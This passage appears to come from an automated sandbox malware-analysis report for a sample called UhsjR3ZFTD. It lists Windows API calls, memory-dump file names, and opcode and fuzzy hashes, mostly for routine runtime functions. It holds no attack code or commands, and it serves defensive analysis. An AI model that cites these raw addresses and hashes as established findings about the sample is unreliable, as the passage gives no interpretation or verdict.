                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 006CA3BF
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 006CA3CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2933794660-0
                                                                                                          • Opcode ID: 48b013122d02ae7bb38361cab42a42950241af6db9e656eefe8ba0c301a3e47d
                                                                                                          • Instruction ID: dec05fdcb9db8343e7399ed20c1ec2875004ec4153a06a29c4e53bdb608a31cd
                                                                                                          • Opcode Fuzzy Hash: 48b013122d02ae7bb38361cab42a42950241af6db9e656eefe8ba0c301a3e47d
                                                                                                          • Instruction Fuzzy Hash: C3F0B234C0030DEBCB00DBB4C98898EBBF4FF1C200BA15996E412EB110E730AB44CB50
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
                                                                                                            • Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006DA9F4
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006DAA3E
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006DAB04
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 661929714-0
                                                                                                          • Opcode ID: 69bd45aca8630b11aea7338ea72ac8ea57fc82827018ef860a426de6f3f5d3ea
                                                                                                          • Instruction ID: 2d050c37e4c27a2ff7c1acec62ad18285da6a22a89560ff1004f3c09f1049b18
                                                                                                          • Opcode Fuzzy Hash: 69bd45aca8630b11aea7338ea72ac8ea57fc82827018ef860a426de6f3f5d3ea
                                                                                                          • Instruction Fuzzy Hash: 53618D719182079BDF689F64CD82BBA73AAEF44300F1441ABED06C6785E734D982DB52
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 006D1BB8
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 006D1BC2
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 006D1BCF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                          • String ID:
                                                                                                          • API String ID: 3906539128-0
                                                                                                          • Opcode ID: c792d79fdde0ed9eb99488fc0039e41240104fe18debc42e4d4939c11533a747
                                                                                                          • Instruction ID: 89ab303e868f68f40fae9864a6ed8be20b36c170d5d230c34168fccd110388f2
                                                                                                          • Opcode Fuzzy Hash: c792d79fdde0ed9eb99488fc0039e41240104fe18debc42e4d4939c11533a747
                                                                                                          • Instruction Fuzzy Hash: 2831C474D01228ABCB61DF68D989BDDBBB9FF08310F5051EAE41CA7261E7709B858F44
                                                                                                          APIs
                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,006DE659,?,?,00000008,?,?,006E53BB,00000000), ref: 006DE92B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionRaise
                                                                                                          • String ID:
                                                                                                          • API String ID: 3997070919-0
                                                                                                          • Opcode ID: 00d23b2d27c462868b923f5c7217bfc5ef56b67c73685d74c9d51afa40b96fc7
                                                                                                          • Instruction ID: 99062e226fe97106dcbc462801938f4679972bbbe675d84e9490f87b4da74bfc
                                                                                                          • Opcode Fuzzy Hash: 00d23b2d27c462868b923f5c7217bfc5ef56b67c73685d74c9d51afa40b96fc7
                                                                                                          • Instruction Fuzzy Hash: D3B16D31A106088FD755DF28C496BA57BE2FF45364F29865AE899CF3A1C336D982CB40
                                                                                                          APIs
                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006C9751
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                          • String ID:
                                                                                                          • API String ID: 2325560087-0
                                                                                                          • Opcode ID: 327fd5ef29b8e1d561569dba17ef0c941a4271752b324f25d800269ed06301f8
                                                                                                          • Instruction ID: dc2f35cc29a4b665b2e9ee0a6d5a4f1ac231c32e4ab73cf0b150f6a7aab256fc
                                                                                                          • Opcode Fuzzy Hash: 327fd5ef29b8e1d561569dba17ef0c941a4271752b324f25d800269ed06301f8
                                                                                                          • Instruction Fuzzy Hash: 22A17CB19016098FEB18CF58D8957B9BBF2FB48354F18A52ED425EB351C3749A40CFA0
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D6664: HeapAlloc.KERNEL32(00000008,?,?,?,006D57FF,00000001,00000364,00000002,000000FF,00000000,?,?,006CD6B5,00000000,?), ref: 006D66A5
                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006DB4F9
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 006DB5ED
                                                                                                          • FindClose.KERNEL32(00000000), ref: 006DB62C
                                                                                                          • FindClose.KERNEL32(00000000), ref: 006DB65F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 2701053895-0
                                                                                                          • Opcode ID: 20a308930d3a8f882eec10912c95ca3081a60c320391dd0903c56d6eabb8c2c7
                                                                                                          • Instruction ID: c364570e5c8efcb700110a7d37b8f7c150de2a2f048a3d6e7cb33d7889bba26b
                                                                                                          • Opcode Fuzzy Hash: 20a308930d3a8f882eec10912c95ca3081a60c320391dd0903c56d6eabb8c2c7
                                                                                                          • Instruction Fuzzy Hash: E2510275D00258EFDF209F289C85AFE77AADF45314F16519EF4099730AEB308D419B64
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
                                                                                                            • Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006DACB4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 3736152602-0
                                                                                                          • Opcode ID: 4a5170d8345d4b9673c5eaed467ad20e1d506cf2cd866b2cf8436752f59b2b77
                                                                                                          • Instruction ID: f38c77aadf167ad9eeb5baff0bd342e23144cad40e6035be24fa88cba2d2c974
                                                                                                          • Opcode Fuzzy Hash: 4a5170d8345d4b9673c5eaed467ad20e1d506cf2cd866b2cf8436752f59b2b77
                                                                                                          • Instruction Fuzzy Hash: A021B072A19206ABDB28AF65DC42EBA73ABEF04311B10007FFD02D6741EB35ED00CA55
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 0-4108050209
                                                                                                          • Opcode ID: c2331c5e33f8e004628fa293c3870a66871b9007b378f32423332b564d3f36e5
                                                                                                          • Instruction ID: 1c8d61a9468e2e4c4f7be5cef30756e680c9cf73e81e748f1c26b48a32c193c3
                                                                                                          • Opcode Fuzzy Hash: c2331c5e33f8e004628fa293c3870a66871b9007b378f32423332b564d3f36e5
                                                                                                          • Instruction Fuzzy Hash: 28B1C170A0060A8BCB249E68C955FFEB7B3FB15300F14462EE4639B791C732DA42CB95
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
                                                                                                            • Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660
                                                                                                          • EnumSystemLocalesW.KERNEL32(006DA9A0,00000001,00000000,?,-00000050,?,006DA783,00000000,-00000002,00000000,?,00000055,?), ref: 006DA96A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 2417226690-0
                                                                                                          • Opcode ID: 3814571bf81d8d33e02c15116bae8c519b28195e35b455a05cbc09e31a16bba5
                                                                                                          • Instruction ID: b60feb03b3a35e576139d7d55cf9df6564a95011f9296173466a486b9c7dedd1
                                                                                                          • Opcode Fuzzy Hash: 3814571bf81d8d33e02c15116bae8c519b28195e35b455a05cbc09e31a16bba5
                                                                                                          • Instruction Fuzzy Hash: 2D11E9366187055FDB18AF79C8A16BAB793FF80358B15442EE9868BB40D771B942C740
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
                                                                                                            • Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006DADD4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 3736152602-0
                                                                                                          • Opcode ID: 89340db4eb09a3049ae793eed53745c738a404853688faf863998a8aadf6c10d
                                                                                                          • Instruction ID: 82ac34b8886732c1dd10aaba072dd92b1c1edf1dbe63b10addb9c0a8537bd18c
                                                                                                          • Opcode Fuzzy Hash: 89340db4eb09a3049ae793eed53745c738a404853688faf863998a8aadf6c10d
                                                                                                          • Instruction Fuzzy Hash: 86112972A152069BDB14AB69DC46ABA73EEEF04310B10407FF502D7381EB38ED00D795
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
                                                                                                            • Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660
                                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,006DAD0A,00000000,00000000,?), ref: 006DAF59
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 3736152602-0
                                                                                                          • Opcode ID: 5dcf82d2055a1af29557e038f6c7400567c9dba8d13c140dbf0f1bb3a106ac05
                                                                                                          • Instruction ID: 7b170dd2310ece28d86d409bca83efd3683fbdebb5f1094d16dfc51d42e081bb
                                                                                                          • Opcode Fuzzy Hash: 5dcf82d2055a1af29557e038f6c7400567c9dba8d13c140dbf0f1bb3a106ac05
                                                                                                          • Instruction Fuzzy Hash: 3101D672E18212AFDB295BA4C945AFE3756DB40354F15446AEC42E7380EB34FE42C692
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
                                                                                                            • Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660
                                                                                                          • EnumSystemLocalesW.KERNEL32(006DAC60,00000001,?,?,-00000050,?,006DA74B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 006DAC3D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 2417226690-0
                                                                                                          • Opcode ID: 5778490ca37eed73dc67682ac4861f8b96ae24e8e623f2d3b926209ebf6ed2fc
                                                                                                          • Instruction ID: 4120ba2a8f74350950a6e4cded642c2530a7054fd350b52b5ec9a14c0640bbc0
                                                                                                          • Opcode Fuzzy Hash: 5778490ca37eed73dc67682ac4861f8b96ae24e8e623f2d3b926209ebf6ed2fc
                                                                                                          • Instruction Fuzzy Hash: 50F046327043045FCB256F79D881ABB7B93EF80328F05842EF9028B790D6B1AC02C640
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D1D71: EnterCriticalSection.KERNEL32(?,?,006D5A48,?,006EFC98,00000008,006D593A,00000000,00000000,?), ref: 006D1D80
                                                                                                          • EnumSystemLocalesW.KERNEL32(006D6560,00000001,006EFD18,0000000C,006D5F61,-00000050), ref: 006D65A5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 1272433827-0
                                                                                                          • Opcode ID: 96c85eb36c04b2bb2e4e218bebd7e7862ba8ccfa9305fa00b144b878ccf4fb13
                                                                                                          • Instruction ID: 2123ea8db1d00f266daa8b9d119effc10aa41ff943ac510b37f7760886106bd0
                                                                                                          • Opcode Fuzzy Hash: 96c85eb36c04b2bb2e4e218bebd7e7862ba8ccfa9305fa00b144b878ccf4fb13
                                                                                                          • Instruction Fuzzy Hash: 4AF03772A01344EFDB00EF98E842BA977F2EB49720F10416AF411DB2A0CBB59940CF84
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
                                                                                                            • Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660
                                                                                                          • EnumSystemLocalesW.KERNEL32(006DAD80,00000001,?,?,?,006DA7A5,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 006DAD6C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 2417226690-0
                                                                                                          • Opcode ID: 6b116df292339ffdfbe6b63888f3ecafbf3bd659f97b0cc434be812e90ace0be
                                                                                                          • Instruction ID: da914a26a3f10a22b71522ec6a8e49ea72219494ee582b81dd8ddfa1ca5538ea
                                                                                                          • Opcode Fuzzy Hash: 6b116df292339ffdfbe6b63888f3ecafbf3bd659f97b0cc434be812e90ace0be
                                                                                                          • Instruction Fuzzy Hash: 8EF0E53AB0020557CB04AF79D855AAA7FA7EFC5751B06405AEA068BB90C672D843C790
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,006D0AC3,?,20001004,00000000,00000002,?,?,006CF9D1), ref: 006D6099
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 2299586839-0
                                                                                                          • Opcode ID: 2f45936bd01f951b567c8090bcaf22e647420f691c388a1de4857b0ba84b4855
                                                                                                          • Instruction ID: 6657850972bada0517d87034720965020e554d8f45906836c9f45ef460608133
                                                                                                          • Opcode Fuzzy Hash: 2f45936bd01f951b567c8090bcaf22e647420f691c388a1de4857b0ba84b4855
